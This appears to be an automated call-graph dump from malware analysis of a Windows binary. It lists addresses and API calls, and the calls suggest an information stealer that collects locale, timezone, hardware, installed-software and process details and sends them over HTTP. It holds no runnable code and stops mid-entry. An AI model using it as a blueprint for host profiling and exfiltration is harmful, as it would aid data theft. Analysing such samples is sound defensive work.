lstrcpy 14422->14424 14430 ff497f 14424->14430 14425 100a820 2 API calls 14426 ff4f05 14425->14426 14428 100a9b0 4 API calls 14426->14428 14427 ff4f27 ctype 14432 100a7a0 lstrcpy 14427->14432 14429 ff4f1b 14428->14429 14431 100a8a0 lstrcpy 14429->14431 14433 100a9b0 4 API calls 14430->14433 14431->14427 14444 ff4f57 14432->14444 14434 ff49a9 14433->14434 14435 100a8a0 lstrcpy 14434->14435 14436 ff49b2 14435->14436 14437 100a9b0 4 API calls 14436->14437 14438 ff49d1 14437->14438 14439 100a8a0 lstrcpy 14438->14439 14440 ff49da 14439->14440 14441 100a920 3 API calls 14440->14441 14442 ff49f8 14441->14442 14443 100a8a0 lstrcpy 14442->14443 14445 ff4a01 14443->14445 14444->13466 14446 100a9b0 4 API calls 14445->14446 14447 ff4a20 14446->14447 14448 100a8a0 lstrcpy 14447->14448 14449 ff4a29 14448->14449 14450 100a9b0 4 API calls 14449->14450 14451 ff4a48 14450->14451 14452 100a8a0 lstrcpy 14451->14452 14453 ff4a51 14452->14453 14454 100a9b0 4 API calls 14453->14454 14455 ff4a7d 14454->14455 14456 100a920 3 API calls 14455->14456 14457 ff4a84 14456->14457 14458 100a8a0 lstrcpy 14457->14458 14459 ff4a8d 14458->14459 14460 ff4aa3 InternetConnectA 14459->14460 14460->14416 14461 ff4ad3 HttpOpenRequestA 14460->14461 14463 ff4ebe InternetCloseHandle 14461->14463 14464 ff4b28 14461->14464 14463->14416 14465 100a9b0 4 API calls 14464->14465 14466 ff4b3c 14465->14466 14467 100a8a0 lstrcpy 14466->14467 14468 ff4b45 14467->14468 14469 100a920 3 API calls 14468->14469 14470 ff4b63 14469->14470 14471 100a8a0 lstrcpy 14470->14471 14472 ff4b6c 14471->14472 14473 100a9b0 4 API calls 14472->14473 14474 ff4b8b 14473->14474 14475 100a8a0 lstrcpy 14474->14475 14476 ff4b94 14475->14476 14477 100a9b0 4 API calls 14476->14477 14478 ff4bb5 14477->14478 14479 100a8a0 lstrcpy 14478->14479 14480 ff4bbe 14479->14480 14481 100a9b0 4 API calls 14480->14481 14482 ff4bde 14481->14482 14483 100a8a0 lstrcpy 14482->14483 14484 ff4be7 14483->14484 14485 100a9b0 4 API calls 14484->14485 14486 ff4c06 14485->14486 14487 100a8a0 lstrcpy 14486->14487 14488 ff4c0f 14487->14488 14489 100a920 3 API calls 14488->14489 14490 ff4c2d 14489->14490 14491 100a8a0 lstrcpy 14490->14491 14492 ff4c36 14491->14492 14493 100a9b0 4 API calls 14492->14493 14494 ff4c55 14493->14494 14495 100a8a0 lstrcpy 14494->14495 14496 ff4c5e 14495->14496 14497 100a9b0 4 API calls 14496->14497 14498 ff4c7d 14497->14498 14499 100a8a0 lstrcpy 14498->14499 14500 ff4c86 14499->14500 14501 100a920 3 API calls 14500->14501 14502 ff4ca4 14501->14502 14503 100a8a0 lstrcpy 14502->14503 14504 ff4cad 14503->14504 14505 100a9b0 4 API calls 14504->14505 14506 ff4ccc 14505->14506 14507 100a8a0 lstrcpy 14506->14507 14508 ff4cd5 14507->14508 14509 100a9b0 4 API calls 14508->14509 14510 ff4cf6 14509->14510 14511 100a8a0 lstrcpy 14510->14511 14512 ff4cff 14511->14512 14513 100a9b0 4 API calls 14512->14513 14514 ff4d1f 14513->14514 14515 100a8a0 lstrcpy 14514->14515 14516 ff4d28 14515->14516 14517 100a9b0 4 API calls 14516->14517 14518 ff4d47 14517->14518 14519 100a8a0 lstrcpy 14518->14519 14520 ff4d50 14519->14520 14521 100a920 3 API calls 14520->14521 14522 ff4d6e 14521->14522 14523 100a8a0 lstrcpy 14522->14523 14524 ff4d77 14523->14524 14525 100a740 lstrcpy 14524->14525 14526 ff4d92 14525->14526 14527 100a920 3 API calls 14526->14527 14528 ff4db3 14527->14528 14529 100a920 3 API calls 14528->14529 14530 ff4dba 14529->14530 14531 100a8a0 lstrcpy 14530->14531 14532 ff4dc6 14531->14532 14533 ff4de7 lstrlen 14532->14533 14534 ff4dfa 14533->14534 14535 ff4e03 lstrlen 14534->14535 15474 100aad0 14535->15474 14537 ff4e13 HttpSendRequestA 14538 ff4e32 InternetReadFile 14537->14538 14539 ff4e67 InternetCloseHandle 14538->14539 14544 ff4e5e 14538->14544 14541 100a800 14539->14541 14541->14463 14542 100a9b0 4 API calls 14542->14544 14543 100a8a0 lstrcpy 14543->14544 14544->14538 14544->14539 14544->14542 14544->14543 15481 100aad0 14545->15481 14547 10017c4 StrCmpCA 14548 10017cf ExitProcess 14547->14548 14550 10017d7 14547->14550 14549 10019c2 14549->13468 14550->14549 14551 10018ad StrCmpCA 14550->14551 14552 10018cf StrCmpCA 14550->14552 14553 1001970 StrCmpCA 14550->14553 14554 10018f1 StrCmpCA 14550->14554 14555 1001951 StrCmpCA 14550->14555 14556 1001932 StrCmpCA 14550->14556 14557 1001913 StrCmpCA 14550->14557 14558 100185d StrCmpCA 14550->14558 14559 100187f StrCmpCA 14550->14559 14560 100a820 lstrlen lstrcpy 14550->14560 14551->14550 14552->14550 14553->14550 14554->14550 14555->14550 14556->14550 14557->14550 14558->14550 14559->14550 14560->14550 14562 100a7a0 lstrcpy 14561->14562 14563 ff5979 14562->14563 14564 ff47b0 2 API calls 14563->14564 14565 ff5985 14564->14565 14566 100a740 lstrcpy 14565->14566 14567 ff59ba 14566->14567 14568 100a740 lstrcpy 14567->14568 14569 ff59c7 14568->14569 14570 100a740 lstrcpy 14569->14570 14571 ff59d4 14570->14571 14572 100a740 lstrcpy 14571->14572 14573 ff59e1 14572->14573 14574 100a740 lstrcpy 14573->14574 14575 ff59ee InternetOpenA StrCmpCA 14574->14575 14576 ff5a1d 14575->14576 14577 ff5fc3 InternetCloseHandle 14576->14577 14578 1008b60 3 API calls 14576->14578 14579 ff5fe0 14577->14579 14580 ff5a3c 14578->14580 14582 ff9ac0 4 API calls 14579->14582 14581 100a920 3 API calls 14580->14581 14583 ff5a4f 14581->14583 14584 ff5fe6 14582->14584 14585 100a8a0 lstrcpy 14583->14585 14586 100a820 2 API calls 14584->14586 14588 ff601f ctype 14584->14588 14590 ff5a58 14585->14590 14587 ff5ffd 14586->14587 14589 100a9b0 4 API calls 14587->14589 14592 100a7a0 lstrcpy 14588->14592 14591 ff6013 14589->14591 14594 100a9b0 4 API calls 14590->14594 14593 100a8a0 lstrcpy 14591->14593 14602 ff604f 14592->14602 14593->14588 14595 ff5a82 14594->14595 14596 100a8a0 lstrcpy 14595->14596 14597 ff5a8b 14596->14597 14598 100a9b0 4 API calls 14597->14598 14599 ff5aaa 14598->14599 14600 100a8a0 lstrcpy 14599->14600 14601 ff5ab3 14600->14601 14603 100a920 3 API calls 14601->14603 14602->13474 14604 ff5ad1 14603->14604 14605 100a8a0 lstrcpy 14604->14605 14606 ff5ada 14605->14606 14607 100a9b0 4 API calls 14606->14607 14608 ff5af9 14607->14608 14609 100a8a0 lstrcpy 14608->14609 14610 ff5b02 14609->14610 14611 100a9b0 4 API calls 14610->14611 14612 ff5b21 14611->14612 14613 100a8a0 lstrcpy 14612->14613 14614 ff5b2a 14613->14614 14615 100a9b0 4 API calls 14614->14615 14616 ff5b56 14615->14616 14617 100a920 3 API calls 14616->14617 14618 ff5b5d 14617->14618 14619 100a8a0 lstrcpy 14618->14619 14620 ff5b66 14619->14620 14621 ff5b7c InternetConnectA 14620->14621 14621->14577 14622 ff5bac HttpOpenRequestA 14621->14622 14624 ff5c0b 14622->14624 14625 ff5fb6 InternetCloseHandle 14622->14625 14626 100a9b0 4 API calls 14624->14626 14625->14577 14627 ff5c1f 14626->14627 14628 100a8a0 lstrcpy 14627->14628 14629 ff5c28 14628->14629 14630 100a920 3 API calls 14629->14630 14631 ff5c46 14630->14631 14632 100a8a0 lstrcpy 14631->14632 14633 ff5c4f 14632->14633 14634 100a9b0 4 API calls 14633->14634 14635 ff5c6e 14634->14635 14636 100a8a0 lstrcpy 14635->14636 14637 ff5c77 14636->14637 14638 100a9b0 4 API calls 14637->14638 14639 ff5c98 14638->14639 14640 100a8a0 lstrcpy 14639->14640 14641 ff5ca1 14640->14641 14642 100a9b0 4 API calls 14641->14642 14643 ff5cc1 14642->14643 14644 100a8a0 lstrcpy 14643->14644 14645 ff5cca 14644->14645 14646 100a9b0 4 API calls 14645->14646 14647 ff5ce9 14646->14647 14648 100a8a0 lstrcpy 14647->14648 14649 ff5cf2 14648->14649 14650 100a920 3 API calls 14649->14650 14651 ff5d10 14650->14651 14652 100a8a0 lstrcpy 14651->14652 14653 ff5d19 14652->14653 14654 100a9b0 4 API calls 14653->14654 14655 ff5d38 14654->14655 14656 100a8a0 lstrcpy 14655->14656 14657 ff5d41 14656->14657 14658 100a9b0 4 API calls 14657->14658 14659 ff5d60 14658->14659 14660 100a8a0 lstrcpy 14659->14660 14661 ff5d69 14660->14661 14662 100a920 3 API calls 14661->14662 14663 ff5d87 14662->14663 14664 100a8a0 lstrcpy 14663->14664 14665 ff5d90 14664->14665 14666 100a9b0 4 API calls 14665->14666 14667 ff5daf 14666->14667 14668 100a8a0 lstrcpy 14667->14668 14669 ff5db8 14668->14669 14670 100a9b0 4 API calls 14669->14670 14671 ff5dd9 14670->14671 14672 100a8a0 lstrcpy 14671->14672 14673 ff5de2 14672->14673 14674 100a9b0 4 API calls 14673->14674 14675 ff5e02 14674->14675 14676 100a8a0 lstrcpy 14675->14676 14677 ff5e0b 14676->14677 14678 100a9b0 4 API calls 14677->14678 14679 ff5e2a 14678->14679 14680 100a8a0 lstrcpy 14679->14680 14681 ff5e33 14680->14681 14682 100a920 3 API calls 14681->14682 14683 ff5e54 14682->14683 14684 100a8a0 lstrcpy 14683->14684 14685 ff5e5d 14684->14685 14686 ff5e70 lstrlen 14685->14686 15482 100aad0 14686->15482 14688 ff5e81 lstrlen GetProcessHeap RtlAllocateHeap 15483 100aad0 14688->15483 14690 ff5eae lstrlen 14691 ff5ebe 14690->14691 14692 ff5ed7 lstrlen 14691->14692 14693 ff5ee7 14692->14693 14694 ff5ef0 lstrlen 14693->14694 14695 ff5f04 14694->14695 14696 ff5f1a lstrlen 14695->14696 15484 100aad0 14696->15484 14698 ff5f2a HttpSendRequestA 14699 ff5f35 InternetReadFile 14698->14699 14700 ff5f6a InternetCloseHandle 14699->14700 14704 ff5f61 14699->14704 14700->14625 14702 100a9b0 4 API calls 14702->14704 14703 100a8a0 lstrcpy 14703->14704 14704->14699 14704->14700 14704->14702 14704->14703 14707 1001077 14705->14707 14706 1001151 14706->13476 14707->14706 14708 100a820 lstrlen lstrcpy 14707->14708 14708->14707 14710 1000db7 14709->14710 14711 1000f17 14710->14711 14712 1000ea4 StrCmpCA 14710->14712 14713 1000e27 StrCmpCA 14710->14713 14714 1000e67 StrCmpCA 14710->14714 14715 100a820 lstrlen lstrcpy 14710->14715 14711->13484 14712->14710 14713->14710 14714->14710 14715->14710 14718 1000f67 14716->14718 14717 1001044 14717->13492 14718->14717 14719 100a820 lstrlen lstrcpy 14718->14719 14720 1000fb2 StrCmpCA 14718->14720 14719->14718 14720->14718 14722 100a740 lstrcpy 14721->14722 14723 1001a26 14722->14723 14724 100a9b0 4 API calls 14723->14724 14725 1001a37 14724->14725 14726 100a8a0 lstrcpy 14725->14726 14727 1001a40 14726->14727 14728 100a9b0 4 API calls 14727->14728 14729 1001a5b 14728->14729 14730 100a8a0 lstrcpy 14729->14730 14731 1001a64 14730->14731 14732 100a9b0 4 API calls 14731->14732 14733 1001a7d 14732->14733 14734 100a8a0 lstrcpy 14733->14734 14735 1001a86 14734->14735 14736 100a9b0 4 API calls 14735->14736 14737 1001aa1 14736->14737 14738 100a8a0 lstrcpy 14737->14738 14739 1001aaa 14738->14739 14740 100a9b0 4 API calls 14739->14740 14741 1001ac3 14740->14741 14742 100a8a0 lstrcpy 14741->14742 14743 1001acc 14742->14743 14744 100a9b0 4 API calls 14743->14744 14745 1001ae7 14744->14745 14746 100a8a0 lstrcpy 14745->14746 14747 1001af0 14746->14747 14748 100a9b0 4 API calls 14747->14748 14749 1001b09 14748->14749 14750 100a8a0 lstrcpy 14749->14750 14751 1001b12 14750->14751 14752 100a9b0 4 API calls 14751->14752 14753 1001b2d 14752->14753 14754 100a8a0 lstrcpy 14753->14754 14755 1001b36 14754->14755 14756 100a9b0 4 API calls 14755->14756 14757 1001b4f 14756->14757 14758 100a8a0 lstrcpy 14757->14758 14759 1001b58 14758->14759 14760 100a9b0 4 API calls 14759->14760 14761 1001b76 14760->14761 14762 100a8a0 lstrcpy 14761->14762 14763 1001b7f 14762->14763 14764 1007500 6 API calls 14763->14764 14765 1001b96 14764->14765 14766 100a920 3 API calls 14765->14766 14767 1001ba9 14766->14767 14768 100a8a0 lstrcpy 14767->14768 14769 1001bb2 14768->14769 14770 100a9b0 4 API calls 14769->14770 14771 1001bdc 14770->14771 14772 100a8a0 lstrcpy 14771->14772 14773 1001be5 14772->14773 14774 100a9b0 4 API calls 14773->14774 14775 1001c05 14774->14775 14776 100a8a0 lstrcpy 14775->14776 14777 1001c0e 14776->14777 15485 1007690 GetProcessHeap RtlAllocateHeap 14777->15485 14780 100a9b0 4 API calls 14781 1001c2e 14780->14781 14782 100a8a0 lstrcpy 14781->14782 14783 1001c37 14782->14783 14784 100a9b0 4 API calls 14783->14784 14785 1001c56 14784->14785 14786 100a8a0 lstrcpy 14785->14786 14787 1001c5f 14786->14787 14788 100a9b0 4 API calls 14787->14788 14789 1001c80 14788->14789 14790 100a8a0 lstrcpy 14789->14790 14791 1001c89 14790->14791 15492 10077c0 GetCurrentProcess IsWow64Process 14791->15492 14794 100a9b0 4 API calls 14795 1001ca9 14794->14795 14796 100a8a0 lstrcpy 14795->14796 14797 1001cb2 14796->14797 14798 100a9b0 4 API calls 14797->14798 14799 1001cd1 14798->14799 14800 100a8a0 lstrcpy 14799->14800 14801 1001cda 14800->14801 14802 100a9b0 4 API calls 14801->14802 14803 1001cfb 14802->14803 14804 100a8a0 lstrcpy 14803->14804 14805 1001d04 14804->14805 14806 1007850 3 API calls 14805->14806 14807 1001d14 14806->14807 14808 100a9b0 4 API calls 14807->14808 14809 1001d24 14808->14809 14810 100a8a0 lstrcpy 14809->14810 14811 1001d2d 14810->14811 14812 100a9b0 4 API calls 14811->14812 14813 1001d4c 14812->14813 14814 100a8a0 lstrcpy 14813->14814 14815 1001d55 14814->14815 14816 100a9b0 4 API calls 14815->14816 14817 1001d75 14816->14817 14818 100a8a0 lstrcpy 14817->14818 14819 1001d7e 14818->14819 14820 10078e0 3 API calls 14819->14820 14821 1001d8e 14820->14821 14822 100a9b0 4 API calls 14821->14822 14823 1001d9e 14822->14823 14824 100a8a0 lstrcpy 14823->14824 14825 1001da7 14824->14825 14826 100a9b0 4 API calls 14825->14826 14827 1001dc6 14826->14827 14828 100a8a0 lstrcpy 14827->14828 14829 1001dcf 14828->14829 14830 100a9b0 4 API calls 14829->14830 14831 1001df0 14830->14831 14832 100a8a0 lstrcpy 14831->14832 14833 1001df9 14832->14833 15494 1007980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14833->15494 14836 100a9b0 4 API calls 14837 1001e19 14836->14837 14838 100a8a0 lstrcpy 14837->14838 14839 1001e22 14838->14839 14840 100a9b0 4 API calls 14839->14840 14841 1001e41 14840->14841 14842 100a8a0 lstrcpy 14841->14842 14843 1001e4a 14842->14843 14844 100a9b0 4 API calls 14843->14844 14845 1001e6b 14844->14845 14846 100a8a0 lstrcpy 14845->14846 14847 1001e74 14846->14847 15496 1007a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14847->15496 14850 100a9b0 4 API calls 14851 1001e94 14850->14851 14852 100a8a0 lstrcpy 14851->14852 14853 1001e9d 14852->14853 14854 100a9b0 4 API calls 14853->14854 14855 1001ebc 14854->14855 14856 100a8a0 lstrcpy 14855->14856 14857 1001ec5 14856->14857 14858 100a9b0 4 API calls 14857->14858 14859 1001ee5 14858->14859 14860 100a8a0 lstrcpy 14859->14860 14861 1001eee 14860->14861 15499 1007b00 GetUserDefaultLocaleName 14861->15499 14864 100a9b0 4 API calls 14865 1001f0e 14864->14865 14866 100a8a0 lstrcpy 14865->14866 14867 1001f17 14866->14867 14868 100a9b0 4 API calls 14867->14868 14869 1001f36 14868->14869 14870 100a8a0 lstrcpy 14869->14870 14871 1001f3f 14870->14871 14872 100a9b0 4 API calls 14871->14872 14873 1001f60 14872->14873 14874 100a8a0 lstrcpy 14873->14874 14875 1001f69 14874->14875 15503 1007b90 14875->15503 14877 1001f80 14878 100a920 3 API calls 14877->14878 14879 1001f93 14878->14879 14880 100a8a0 lstrcpy 14879->14880 14881 1001f9c 14880->14881 14882 100a9b0 4 API calls 14881->14882 14883 1001fc6 14882->14883 14884 100a8a0 lstrcpy 14883->14884 14885 1001fcf 14884->14885 14886 100a9b0 4 API calls 14885->14886 14887 1001fef 14886->14887 14888 100a8a0 lstrcpy 14887->14888 14889 1001ff8 14888->14889 15515 1007d80 GetSystemPowerStatus 14889->15515 14892 100a9b0 4 API calls 14893 1002018 14892->14893 14894 100a8a0 lstrcpy 14893->14894 14895 1002021 14894->14895 14896 100a9b0 4 API calls 14895->14896 14897 1002040 14896->14897 14898 100a8a0 lstrcpy 14897->14898 14899 1002049 14898->14899 14900 100a9b0 4 API calls 14899->14900 14901 100206a 14900->14901 14902 100a8a0 lstrcpy 14901->14902 14903 1002073 14902->14903 14904 100207e GetCurrentProcessId 14903->14904 15517 1009470 OpenProcess 14904->15517 14907 100a920 3 API calls 14908 10020a4 14907->14908 14909 100a8a0 lstrcpy 14908->14909 14910 10020ad 14909->14910 14911 100a9b0 4 API calls 14910->14911 14912 10020d7 14911->14912 14913 100a8a0 lstrcpy 14912->14913 14914 10020e0 14913->14914 14915 100a9b0 4 API calls 14914->14915 14916 1002100 14915->14916 14917 100a8a0 lstrcpy 14916->14917 14918 1002109 14917->14918 15522 1007e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14918->15522 14921 100a9b0 4 API calls 14922 1002129 14921->14922 14923 100a8a0 lstrcpy 14922->14923 14924 1002132 14923->14924 14925 100a9b0 4 API calls 14924->14925 14926 1002151 14925->14926 14927 100a8a0 lstrcpy 14926->14927 14928 100215a 14927->14928 14929 100a9b0 4 API calls 14928->14929 14930 100217b 14929->14930 14931 100a8a0 lstrcpy 14930->14931 14932 1002184 14931->14932 15526 1007f60 14932->15526 14935 100a9b0 4 API calls 14936 10021a4 14935->14936 14937 100a8a0 lstrcpy 14936->14937 14938 10021ad 14937->14938 14939 100a9b0 4 API calls 14938->14939 14940 10021cc 14939->14940 14941 100a8a0 lstrcpy 14940->14941 14942 10021d5 14941->14942 14943 100a9b0 4 API calls 14942->14943 14944 10021f6 14943->14944 14945 100a8a0 lstrcpy 14944->14945 14946 10021ff 14945->14946 15539 1007ed0 GetSystemInfo wsprintfA 14946->15539 14949 100a9b0 4 API calls 14950 100221f 14949->14950 14951 100a8a0 lstrcpy 14950->14951 14952 1002228 14951->14952 14953 100a9b0 4 API calls 14952->14953 14954 1002247 14953->14954 14955 100a8a0 lstrcpy 14954->14955 14956 1002250 14955->14956 14957 100a9b0 4 API calls 14956->14957 14958 1002270 14957->14958 14959 100a8a0 lstrcpy 14958->14959 14960 1002279 14959->14960 15541 1008100 GetProcessHeap RtlAllocateHeap 14960->15541 14963 100a9b0 4 API calls 14964 1002299 14963->14964 14965 100a8a0 lstrcpy 14964->14965 14966 10022a2 14965->14966 14967 100a9b0 4 API calls 14966->14967 14968 10022c1 14967->14968 14969 100a8a0 lstrcpy 14968->14969 14970 10022ca 14969->14970 14971 100a9b0 4 API calls 14970->14971 14972 10022eb 14971->14972 14973 100a8a0 lstrcpy 14972->14973 14974 10022f4 14973->14974 15547 10087c0 14974->15547 14977 100a920 3 API calls 14978 100231e 14977->14978 14979 100a8a0 lstrcpy 14978->14979 14980 1002327 14979->14980 14981 100a9b0 4 API calls 14980->14981 14982 1002351 14981->14982 14983 100a8a0 lstrcpy 14982->14983 14984 100235a 14983->14984 14985 100a9b0 4 API calls 14984->14985 14986 100237a 14985->14986 14987 100a8a0 lstrcpy 14986->14987 14988 1002383 14987->14988 14989 100a9b0 4 API calls 14988->14989 14990 10023a2 14989->14990 14991 100a8a0 lstrcpy 14990->14991 14992 10023ab 14991->14992 15552 10081f0 14992->15552 14994 10023c2 14995 100a920 3 API calls 14994->14995 14996 10023d5 14995->14996 14997 100a8a0 lstrcpy 14996->14997 14998 10023de 14997->14998 14999 100a9b0 4 API calls 14998->14999 15000 100240a 14999->15000 15001 100a8a0 lstrcpy 15000->15001 15002 1002413 15001->15002 15003 100a9b0 4 API calls 15002->15003 15004 1002432 15003->15004 15005 100a8a0 lstrcpy 15004->15005 15006 100243b 15005->15006 15007 100a9b0 4 API calls 15006->15007 15008 100245c 15007->15008 15009 100a8a0 lstrcpy 15008->15009 15010 1002465 15009->15010 15011 100a9b0 4 API calls 15010->15011 15012 1002484 15011->15012 15013 100a8a0 lstrcpy 15012->15013 15014 100248d 15013->15014 15015 100a9b0 4 API calls 15014->15015 15016 10024ae 15015->15016 15017 100a8a0 lstrcpy 15016->15017 15018 10024b7 15017->15018 15560 1008320 15018->15560 15020 10024d3 15021 100a920 3 API calls 15020->15021 15022 10024e6 15021->15022 15023 100a8a0 lstrcpy 15022->15023 15024 10024ef 15023->15024 15025 100a9b0 4 API calls 15024->15025 15026 1002519 15025->15026 15027 100a8a0 lstrcpy 15026->15027 15028 1002522 15027->15028 15029 100a9b0 4 API calls 15028->15029 15030 1002543 15029->15030 15031 100a8a0 lstrcpy 15030->15031 15032 100254c 15031->15032 15033 1008320 17 API calls 15032->15033 15034 1002568 15033->15034 15035 100a920 3 API calls 15034->15035 15036 100257b 15035->15036 15037 100a8a0 lstrcpy 15036->15037 15038 1002584 15037->15038 15039 100a9b0 4 API calls 15038->15039 15040 10025ae 15039->15040 15041 100a8a0 lstrcpy 15040->15041 15042 10025b7 15041->15042 15043 100a9b0 4 API calls 15042->15043 15044 10025d6 15043->15044 15045 100a8a0 lstrcpy 15044->15045 15046 10025df 15045->15046 15047 100a9b0 4 API calls 15046->15047 15048 1002600 15047->15048 15049 100a8a0 lstrcpy 15048->15049 15050 1002609 15049->15050 15596 1008680 15050->15596 15052 1002620 15053 100a920 3 API calls 15052->15053 15054 1002633 15053->15054 15055 100a8a0 lstrcpy 15054->15055 15056 100263c 15055->15056 15057 100265a lstrlen 15056->15057 15058 100266a 15057->15058 15059 100a740 lstrcpy 15058->15059 15060 100267c 15059->15060 15061 ff1590 lstrcpy 15060->15061 15062 100268d 15061->15062 15606 1005190 15062->15606 15064 1002699 15064->13496 15794 100aad0 15065->15794 15067 ff5009 InternetOpenUrlA 15071 ff5021 15067->15071 15068 ff502a InternetReadFile 15068->15071 15069 ff50a0 InternetCloseHandle InternetCloseHandle 15070 ff50ec 15069->15070 15070->13500 15071->15068 15071->15069 15795 ff98d0 15072->15795 15074 1000759 15075 1000a38 15074->15075 15076 100077d 15074->15076 15077 ff1590 lstrcpy 15075->15077 15079 1000799 StrCmpCA 15076->15079 15078 1000a49 15077->15078 15971 1000250 15078->15971 15081 10007a8 15079->15081 15082 1000843 15079->15082 15084 100a7a0 lstrcpy 15081->15084 15085 1000865 StrCmpCA 15082->15085 15086 10007c3 15084->15086 15088 1000874 15085->15088 15124 100096b 15085->15124 15087 ff1590 lstrcpy 15086->15087 15089 100080c 15087->15089 15090 100a740 lstrcpy 15088->15090 15091 100a7a0 lstrcpy 15089->15091 15093 1000881 15090->15093 15094 1000823 15091->15094 15092 100099c StrCmpCA 15095 1000a2d 15092->15095 15096 10009ab 15092->15096 15097 100a9b0 4 API calls 15093->15097 15098 100a7a0 lstrcpy 15094->15098 15095->13504 15099 ff1590 lstrcpy 15096->15099 15100 10008ac 15097->15100 15102 100083e 15098->15102 15103 10009f4 15099->15103 15101 100a920 3 API calls 15100->15101 15104 10008b3 15101->15104 15798 fffb00 15102->15798 15106 100a7a0 lstrcpy 15103->15106 15108 100a9b0 4 API calls 15104->15108 15107 1000a0d 15106->15107 15109 100a7a0 lstrcpy 15107->15109 15110 10008ba 15108->15110 15111 1000a28 15109->15111 15112 100a8a0 lstrcpy 15110->15112 15914 1000030 15111->15914 15124->15092 15446 100a7a0 lstrcpy 15445->15446 15447 ff1683 15446->15447 15448 100a7a0 lstrcpy 15447->15448 15449 ff1695 15448->15449 15450 100a7a0 lstrcpy 15449->15450 15451 ff16a7 15450->15451 15452 100a7a0 lstrcpy 15451->15452 15453 ff15a3 15452->15453 15453->14327 15455 ff47c6 15454->15455 15456 ff4838 lstrlen 15455->15456 15480 100aad0 15456->15480 15458 ff4848 InternetCrackUrlA 15459 ff4867 15458->15459 15459->14404 15461 100a740 lstrcpy 15460->15461 15462 1008b74 15461->15462 15463 100a740 lstrcpy 15462->15463 15464 1008b82 GetSystemTime 15463->15464 15466 1008b99 15464->15466 15465 100a7a0 lstrcpy 15467 1008bfc 15465->15467 15466->15465 15467->14419 15469 100a931 15468->15469 15470 100a988 15469->15470 15472 100a968 lstrcpy lstrcat 15469->15472 15471 100a7a0 lstrcpy 15470->15471 15473 100a994 15471->15473 15472->15470 15473->14422 15474->14537 15476 ff4eee 15475->15476 15477 ff9af9 LocalAlloc 15475->15477 15476->14425 15476->14427 15477->15476 15478 ff9b14 CryptStringToBinaryA 15477->15478 15478->15476 15479 ff9b39 LocalFree 15478->15479 15479->15476 15480->15458 15481->14547 15482->14688 15483->14690 15484->14698 15613 10077a0 15485->15613 15488 10076c6 RegOpenKeyExA 15490 1007704 RegCloseKey 15488->15490 15491 10076e7 RegQueryValueExA 15488->15491 15489 1001c1e 15489->14780 15490->15489 15491->15490 15493 1001c99 15492->15493 15493->14794 15495 1001e09 15494->15495 15495->14836 15497 1001e84 15496->15497 15498 1007a9a wsprintfA 15496->15498 15497->14850 15498->15497 15500 1001efe 15499->15500 15501 1007b4d 15499->15501 15500->14864 15620 1008d20 LocalAlloc CharToOemW 15501->15620 15504 100a740 lstrcpy 15503->15504 15505 1007bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15504->15505 15514 1007c25 15505->15514 15506 1007c46 GetLocaleInfoA 15506->15514 15507 1007d18 15508 1007d28 15507->15508 15509 1007d1e LocalFree 15507->15509 15511 100a7a0 lstrcpy 15508->15511 15509->15508 15510 100a9b0 lstrcpy lstrlen lstrcpy lstrcat 15510->15514 15512 1007d37 15511->15512 15512->14877 15513 100a8a0 lstrcpy 15513->15514 15514->15506 15514->15507 15514->15510 15514->15513 15516 1002008 15515->15516 15516->14892 15518 1009493 GetModuleFileNameExA CloseHandle 15517->15518 15519 10094b5 15517->15519 15518->15519 15520 100a740 lstrcpy 15519->15520 15521 1002091 15520->15521 15521->14907 15523 1007e68 RegQueryValueExA 15522->15523 15525 1002119 15522->15525 15524 1007e8e RegCloseKey 15523->15524 15524->15525 15525->14921 15527 1007fb9 GetLogicalProcessorInformationEx 15526->15527 15528 1007fd8 GetLastError 15527->15528 15529 1008029 15527->15529 15531 1008022 15528->15531 15536 1007fe3 15528->15536 15535 10089f0 2 API calls 15529->15535 15533 1002194 15531->15533 15534 10089f0 2 API calls 15531->15534 15533->14935 15534->15533 15537 100807b 15535->15537 15536->15527 15536->15533 15621 10089f0 15536->15621 15624 1008a10 GetProcessHeap RtlAllocateHeap 15536->15624 15537->15531 15538 1008084 wsprintfA 15537->15538 15538->15533 15540 100220f 15539->15540 15540->14949 15542 10089b0 15541->15542 15543 100814d GlobalMemoryStatusEx 15542->15543 15546 1008163 __aulldiv 15543->15546 15544 100819b wsprintfA 15545 1002289 15544->15545 15545->14963 15546->15544 15548 10087fb GetProcessHeap RtlAllocateHeap wsprintfA 15547->15548 15550 100a740 lstrcpy 15548->15550 15551 100230b 15550->15551 15551->14977 15553 100a740 lstrcpy 15552->15553 15559 1008229 15553->15559 15554 1008263 15556 100a7a0 lstrcpy 15554->15556 15555 100a9b0 lstrcpy lstrlen lstrcpy lstrcat 15555->15559 15557 10082dc 15556->15557 15557->14994 15558 100a8a0 lstrcpy 15558->15559 15559->15554 15559->15555 15559->15558 15561 100a740 lstrcpy 15560->15561 15562 100835c RegOpenKeyExA 15561->15562 15563 10083d0 15562->15563 15564 10083ae 15562->15564 15566 1008613 RegCloseKey 15563->15566 15567 10083f8 RegEnumKeyExA 15563->15567 15565 100a7a0 lstrcpy 15564->15565 15576 10083bd 15565->15576 15570 100a7a0 lstrcpy 15566->15570 15568 100860e 15567->15568 15569 100843f wsprintfA RegOpenKeyExA 15567->15569 15568->15566 15571 10084c1 RegQueryValueExA 15569->15571 15572 1008485 RegCloseKey RegCloseKey 15569->15572 15570->15576 15574 1008601 RegCloseKey 15571->15574 15575 10084fa lstrlen 15571->15575 15573 100a7a0 lstrcpy 15572->15573 15573->15576 15574->15568 15575->15574 15577 1008510 15575->15577 15576->15020 15578 100a9b0 4 API calls 15577->15578 15579 1008527 15578->15579 15580 100a8a0 lstrcpy 15579->15580 15581 1008533 15580->15581 15582 100a9b0 4 API calls 15581->15582 15583 1008557 15582->15583 15584 100a8a0 lstrcpy 15583->15584 15585 1008563 15584->15585 15586 100856e RegQueryValueExA 15585->15586 15586->15574 15587 10085a3 15586->15587 15588 100a9b0 4 API calls 15587->15588 15589 10085ba 15588->15589 15590 100a8a0 lstrcpy 15589->15590 15591 10085c6 15590->15591 15592 100a9b0 4 API calls 15591->15592 15593 10085ea 15592->15593 15594 100a8a0 lstrcpy 15593->15594 15595 10085f6 15594->15595 15595->15574 15597 100a740 lstrcpy 15596->15597 15598 10086bc CreateToolhelp32Snapshot Process32First 15597->15598 15599 10086e8 Process32Next 15598->15599 15600 100875d CloseHandle 15598->15600 15599->15600 15605 10086fd 15599->15605 15601 